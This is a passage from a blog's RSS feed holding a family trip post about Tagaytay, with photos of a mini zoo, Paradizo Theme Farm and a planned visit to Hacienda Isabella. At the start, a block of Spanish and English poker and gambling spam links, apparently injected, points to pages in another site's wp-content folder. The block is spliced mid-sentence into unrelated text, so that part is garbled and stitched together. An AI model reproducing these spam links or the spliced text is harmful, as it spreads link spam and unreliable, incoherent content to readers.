holdem,jugar poker texas holdem,poker texas holdem gratis</a><a href="http://crackinz.com/wp-content/1/descargar-gratis-juego-de-poker.html">descargar gratis juego de poker</a><a href="http://crackinz.com/wp-content/1/play-7-card-stud.html">play 7 card stud</a><a href="http://crackinz.com/wp-content/1/pai-gow-poker-portales-internet.html">pai gow poker portales internet</a><a href="http://crackinz.com/wp-content/1/reglamentos-poker.html">reglamentos poker</a><a href="http://crackinz.com/wp-content/1/juego-al-instante-portal-internet.html">juego al instante portal internet</a><a href="http://crackinz.com/wp-content/1/texas-holdem.html">poker texas holdem online,texas holdem estrategia,texas holdem</a><a href="http://crackinz.com/wp-content/1/poker-caribe-portal.html">poker caribe portal</a><a href="http://crackinz.com/wp-content/1/5-card-stud.html">5 card stud</a></u> development which involves only code but also it will take time to modify and re factor.</p>
<p><a href="http://carey.dayrit.org/wp-content/uploads/2008/IMG_1822.gif"><img src="http://carey.dayrit.org/wp-content/uploads/2008/_IMG_1822.gif" width="250" height="187" alt="" title=""  /></a></p>
<p>Caju beside the pool.  After we go through a mini zoo, I've been surprised because the entrance prize at the mini zoo is a little bit high then the attendant at the gate informed us that it's not for the mini zoo alone but the Paradizo Theme Farm. We've taken a peak inside and have pictures.</p>
<p><a href="http://carey.dayrit.org/wp-content/uploads/2008/IMG_1832.gif"><img src="http://carey.dayrit.org/wp-content/uploads/2008/_IMG_1832.gif" width="250" height="187" alt="" title=""  /></a></p>
<p>It's a 15 minute drive from the Residence Inn Mini Zoo to Paradizo but well it is much better, my kids have a great time at the Paradizo.  They really like farm animals.</p>
<p><a href="http://carey.dayrit.org/wp-content/uploads/2008/IMG_1836.gif"><img src="http://carey.dayrit.org/wp-content/uploads/2008/_IMG_1836.gif" width="250" height="187" alt="" title=""  /></a></p>
<p>The sad part is we lack time, we want then to visit Hacienda Isabella which is owned by Kuh Ledesma and has been the set for the movie "Till I met you" by Robin and Regine we didn't go through because it's getting dark.  Before we left Tagaytay we don't want to miss the delicious rare one of a kind Mushroom burger along Aguinaldo road.</p>
]]></content:encoded>
			<wfw:commentRss>http://carey.dayrit.org/family/tagaytay-trip.html/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
